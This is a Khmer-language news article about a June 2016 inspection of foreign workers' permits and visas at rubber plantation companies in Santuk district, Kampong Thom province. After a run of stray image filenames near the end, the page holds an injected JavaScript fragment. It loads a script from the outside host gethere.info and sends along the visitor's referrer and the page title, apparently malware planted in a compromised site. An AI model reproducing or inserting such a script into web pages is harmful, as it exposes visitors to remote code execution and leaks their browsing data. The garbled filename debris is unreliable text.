ព្រឹតិ្តការណ៍ថ្មីៗ

អាជ្ញាធរខេត្តកំពង់ធំចុះផ្សព្វផ្សាយច្បាប់និងត្រួតពិនិត្យជនអន្តោប្រវេសន៍តាមបណ្តាក្រុមហ៊ុនចំការកៅស៊ូក្នុងស្រុកសន្ទុក

2 ឆ្នាំ មុន 2 តូ សុផល

កំពង់ធំ៖ ឯកឧត្តម គង់ វិមាន អភិបាលរងខេត្តកំពង់ធំ បានដឹកនាំក្រុមការងារចុះត្រួតពិនិត្យជនអន្តោប្រវេសន៍តាមបណ្តាក្រុមហ៊ុនចំការកស៊ូក្នុងស្រុកសន្ទុក ខេត្តកំពង់ធំ នៅថ្ងៃទី ៦ ខែ មិថុនា ឆ្នាំ២០១៦ដោយមានការ ចូលរួម ពីប្រធានអង្គភាពពាក់ព័ន្ធ។ ក្នុងការចុះត្រួតពិនិត្យឯកឧត្តម គង់ វិមាន បានមានប្រសាសន៍សូមស្នើក្រុមហ៊ុនត្រូវយកតារាងបើក
ប្រាក់ច្បាប់ដើមរបស់កម្មករដែលធ្វើការនៅក្នុងក្រុមហ៊ុនមកត្រួតពិនិត្យជាមុនសិន សូមឲ្យក្រុមហ៊ុនប្រគល់កាតរបស់ក្រសួការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈដែលបានផ្តល់ទៅឲ្យជនបរទេសទាំងអស់ត្រូវដាក់ជាប់និងខ្លួនជានិច្ចដើម្បីងាយស្រួលក្រុមការងារ អធិការ កិច្ចចុះពិនិត្យមើល ប្រសិនបើជនបរទេសណាគ្មានកាតនៅជាប់និងខ្លួនចាត់ទុកថាគេចវេសមិនបានធ្វើសៀវភៅការងារចំពោះជនបរ ទេសដែលមានវីសារ E ទោះបីមកធ្វើការនៅក្នុងឆ្នាំ២០១៦ ក៏ដោយ មួយថ្ងៃក៏គិតសៀវភៅការងារមួយឆ្នាំដែរ ទោះបីក្រុមហ៊ុនជួល អ្នកមកដាំស្លក៏ដោយបើសិនគ្មានវីសារ E ទេត្រុវបណ្តេញចេញឲ្យត្រឡប់ទៅស្រុកវិញ កុំឲ្យមន្ទីរការងារបណ្តុះបណ្តាល វិជ្ជាជីវៈធ្វើ ការផាកពិន័យទៅនាំឲ្យមានការលំបាក ហើយនេះជាការផ្សព្វផ្សាយជាលើកទីពីរដែរ ចំពោះការផាកពិន័យគឺផ្អែក ទៅលើ តារាង បរិយាយបទល្មើសដែលមាន២១ចំណុចដែលចុះហត្ថលេខាអន្តរក្រសួង គឺក្រសួការងារនិងបណ្តុះបណ្តាល វិជ្ជាជីវៈនិងក្រសួង សេដ្ឋ កិច្ចនិងហិរញ្ញវត្ថុ ដោយឡែកចំពោះជនបរទេសដែលមកស្នាក់នៅក្នុងទីតាំងរបស់ក្រុមហ៊ុន ម្ចាស់ក្រុមហ៊ុនត្រូវរាយការណ៍ ដល់អាជ្ញា ធរមូលដ្ឋានមិនឲ្យលើសពីម្ភៃបួនម៉ោងនេះជាកាត្វកិច្ចរបស់ម្ចាស់ទីតាំងដែលរដ្ឋបានអនុញ្ញាតសម្បទានសង្គមកិច្ចឬសម្បទានសេដ្ឋកិច្ចហើយក្រុមហ៊ុនត្រូវមានការទទួលខុសត្រូវ និងបង្កលក្ខណៈឲ្យសមត្ថកិច្ចបានត្រួតពិនិត្យផងដែរ ក្នុងករណីមិនមិនរៀងចាលអាជ្ញាធរ និងរៀបចំសំណុំរឿងទៅតុលាការ ចុងបញ្ចប់ឯកឧត្តមស្នើឲ្យក្រុមការងារចុះត្រួតពិនិត្យដោយយកចិត្តទុកដាក់និងមានភាពច្បាស់លាស់ ។

7e5d9588-0d18-4359-85ef-c36972c884ba 35e4cf14-cdaa-4b65-b289-0a7462d5c371 435b04f5-8b01-43ff-a9f8-9f1057aae9d4 1047e019-b490-4d92-b665-e3d5da152934 (1) 2581b52b-75e5-4aac-a979-a9ccbc77f5e8 11872305_10153513108267508_7760316066293043812_os.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!